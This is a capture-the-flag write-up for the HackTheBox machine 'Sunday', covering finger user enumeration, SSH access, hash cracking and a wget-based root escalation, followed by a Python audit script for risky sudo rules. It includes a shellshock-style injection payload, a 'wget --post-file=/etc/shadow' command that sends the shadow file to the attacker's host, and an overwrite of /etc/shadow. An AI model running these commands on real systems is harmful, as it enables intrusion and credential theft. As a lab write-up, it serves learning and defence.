HTB Write-up Sunday
What I learned today:
Nmap: -p- --max-retries 1 (or 0) speeds up the all-port scan a bit.
Port 79 finger service, https://en.wikipedia.org/wiki/Finger_%28protocol%29
The finger-user-enum tool revealed some usernames on the service.
ssh: add a key exchange algorithm with -oKexAlgorithms=+ALGORITHM_NAME
Piping the output through | less -S turns off line wrapping (otherwise the output is too messy).
For ssh password cracking, use patator.
syntax:
Wget
wget -i FILE reads FILE as a list of URLs, which exposes its contents.
wget --post-file=FILE_PATH IP uploads a file to Kali (with nc listening on 80).
Create a hash
A regular enumeration scan won't show the extra open ports, which include the SSH port.
Do a -p- scan even though it takes forever (speed it up with -p- --max-retries 1 or 0). Once we find weird ports, do a port-specific scan, like:
Port 79 finger service, https://en.wikipedia.org/wiki/Finger_%28protocol%29
Enumeration-
For finger enum, I used
For usernames, I used /usr/share/seclists/Usernames/Names/names.txt
Syntax:
Piping the output through | less -S turns off line wrapping (otherwise the output is too messy).
We got the usernames sammy and sunny.
We can try to ssh into it. The password for the sammy account was sunny.
When you try to log in, it might give this error:
"No matching key exchange method found. Their offer : ~"
Try adding one of the offered key exchange algorithms with -oKexAlgorithms=+ALGORITHM_NAME
Now we are in.
SSH Password Cracking
For ssh password cracking, use patator.
syntax:
Use a password list that's not too big, or create your own password list.
515 printer
I found info about LPD here and tried it, but didn't get a result: negative acknowledgement.
oh wait...
python lpdtest.py 10.129.159.222 in '() {:;}; ping -c1 10.10.14.125'
I used the above command and it executed it...
Does that mean we can get the shell back?
--- it didn't work.
Priv Esc
When looking into the files, we found a backup file.
We found a shadow file.
Crack the hash with hashcat: hashcat -m 7400 hash.txt rockyou.txt
Cracked the password for sammy.
Switched user to sammy with the password.
Now it shows the system name, SunOS 5.11. Maybe it's vulnerable to shellshock?
If this worked, it's possible that the system is vulnerable to shellshock.
No env variables.
Do env and just pick one to use.
Looks like it's not vulnerable this time.
When checking sammy's sudo -l,
wget is available. Run wget -h to see all the options we could use:
sudo wget -i enabled us to read root's files.
Create a file called "troll" with content like below.
Upload it with the sammy account:
and switch back to sunny (who has sudo access to it) to execute it.
In this particular box, there's a task that keeps overwriting the file.
To get around this,
let's have two ssh sessions open: one as sammy (wget to upload the file) and one as sunny (to execute the file).
On the sammy session, use
to make the system sleep for 5 seconds, and then quickly run the file from the sunny session.
For some reason, I couldn't execute /root/troll, so I'm going to try another method.
I used sudo wget --post-file=/etc/shadow 10.10.14.131 to upload the shadow file to Kali (nc listening on 80).
Created a new file called shadow:
Create a new hash.
Paste the hash at the top.
Upload the shadow file from the sammy account:
sudo wget 10.10.14.131/shadow -O /etc/shadow
We can confirm here that the shadow file got updated.
With the new pass, I got in!
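As an added example (not from the original write-up or the box), this Python script audits sudo -l output for the rule that made this privilege escalation possible: wget runnable as root. The sample output is constructed to mirror the two accounts above, and the audit also reports the chained case where one user's root-executed script sits in a directory another user can write to via wget -O.

```python
import re

# Constructed 'sudo -l' output modelled on the two accounts in this write-up
# (sammy: wget as root; sunny: /root/troll as root). Not captured from the box.
SAMPLE_SUDO_L = """\
User sammy may run the following commands on sunday:
    (root) NOPASSWD: /usr/bin/wget
User sunny may run the following commands on sunday:
    (root) NOPASSWD: /root/troll
"""

# The three wget switches the write-up used, which is why wget as root is a finding.
WGET_ABUSE = "-i (read any file), --post-file (exfiltrate any file), -O (overwrite any file)"

USER_RE = re.compile(r"^User (\S+) may run")
ENTRY_RE = re.compile(r"^\s*\(([^)]+)\)\s*((?:[A-Z]+:\s*)*)(.+)$")

def parse_sudo_l(text):
    """Return [(user, runas, nopasswd, command), ...] from 'sudo -l' output."""
    entries, user = [], None
    for line in text.splitlines():
        m = USER_RE.match(line)
        if m:
            user = m.group(1)
            continue
        m = ENTRY_RE.match(line)
        if m and user:
            runas, tags, cmd = m.group(1).strip(), m.group(2), m.group(3).strip()
            entries.append((user, runas, "NOPASSWD:" in tags, cmd))
    return entries

def audit(text):
    """Flag sudo rules that hand out root file access, and rules that depend on them."""
    entries, findings, root_writers = parse_sudo_l(text), [], []
    for user, runas, nopasswd, cmd in entries:
        prog = cmd.split()[0].rsplit("/", 1)[-1]
        if prog == "wget" and runas in ("root", "ALL"):
            root_writers.append(user)  # this user can write arbitrary files as root
            pw = " without a password" if nopasswd else ""
            findings.append(f"{user}: wget runs as {runas}{pw}; {WGET_ABUSE}")
    for user, runas, nopasswd, cmd in entries:
        path = cmd.split()[0]
        if path.startswith("/root/") and root_writers:
            findings.append(f"{user}: {path} runs as {runas}, but "
                            f"{', '.join(root_writers)} can replace it with wget -O")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_SUDO_L):
        print(finding)
```

Feed it the real sudo -l output of each account to turn the write-up's manual check into a repeatable one; the fix on the host side is to drop the wget rule (or restrict it to a wrapper) and keep root-executed scripts out of paths other users can write.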